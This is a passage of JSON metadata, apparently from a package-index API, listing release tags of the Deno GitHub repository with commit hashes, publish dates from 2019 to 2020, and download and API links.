https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts